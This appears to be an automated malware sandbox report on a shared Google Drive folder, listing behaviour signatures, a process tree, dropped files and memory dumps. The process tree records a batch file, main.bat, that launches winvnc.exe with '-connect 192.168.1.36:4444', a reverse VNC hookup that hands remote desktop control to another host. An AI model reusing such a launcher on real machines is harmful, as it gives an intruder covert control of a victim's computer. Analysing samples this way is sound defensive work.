Analysis

  • max time kernel
    96s
  • max time network
    100s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    06-08-2024 21:32

General

  • Target

    https://drive.google.com/drive/folders/1GzW-K5GWNA77wkqExFFXzCQEiXIM67HZ?usp=sharing

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 63 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/1GzW-K5GWNA77wkqExFFXzCQEiXIM67HZ?usp=sharing
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3088
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0b5646f8,0x7ffc0b564708,0x7ffc0b564718
      2⤵
        PID:3712
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
        2⤵
          PID:3964
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4748
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
          2⤵
            PID:4416
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
            2⤵
              PID:5076
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
              2⤵
                PID:1092
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 /prefetch:8
                2⤵
                  PID:2308
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4536
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
                  2⤵
                    PID:1172
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4672 /prefetch:8
                    2⤵
                      PID:1340
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                      2⤵
                        PID:1464
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2844
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
                        2⤵
                          PID:6108
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                          2⤵
                            PID:6116
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
                            2⤵
                              PID:5228
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                              2⤵
                                PID:5240
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:2964
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4916
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:2688
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\main.bat" "
                                    1⤵
                                      PID:4916
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 1
                                        2⤵
                                        • Delays execution with timeout.exe
                                        PID:4952
                                      • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                        winvnc.exe -run
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:716
                                      • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                        winvnc.exe -connect 192.168.1.36:4444
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2436
                                    • C:\Windows\SysWOW64\DllHost.exe
                                      C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                      1⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5336
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                                      1⤵
                                      • Modifies Internet Explorer settings
                                      • Modifies registry class
                                      • Suspicious behavior: AddClipboardFormatListener
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      PID:5380
                                      • C:\Windows\system32\mmc.exe
                                        "C:\Windows\system32\mmc.exe" "C:\Windows\system32\wf.msc"
                                        2⤵
                                        • Drops file in System32 directory
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5624
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\main.bat" "
                                      1⤵
                                        PID:5852
                                        • C:\Windows\system32\timeout.exe
                                          timeout /t 1
                                          2⤵
                                          • Delays execution with timeout.exe
                                          PID:5904
                                        • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                          winvnc.exe -run
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:6020
                                        • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                          winvnc.exe -connect 192.168.1.36:4444
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:6028
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\main.bat" "
                                        1⤵
                                          PID:3096
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 1
                                            2⤵
                                            • Delays execution with timeout.exe
                                            PID:4344
                                          • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                            winvnc.exe -run
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3292
                                          • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                            winvnc.exe -connect 192.168.1.36:4444
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:944

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                          Filesize

                                          152B

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                          Filesize

                                          152B

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                          Filesize

                                          3KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                          Filesize

                                          6KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                          Filesize

                                          6KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                          Filesize

                                          6KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585119.TMP

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                          Filesize

                                          16B

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                          Filesize

                                          11KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                          Filesize

                                          11KB

                                        • C:\Users\Admin\Downloads\client-20240806T213317Z-001.zip

                                          Filesize

                                          1.0MB

                                        • memory/5624-214-0x000000001DBF0000-0x000000001E0D6000-memory.dmp

                                          Filesize

                                          4.9MB

                                        • memory/5624-215-0x000000001DB10000-0x000000001DB32000-memory.dmp

                                          Filesize

                                          136KB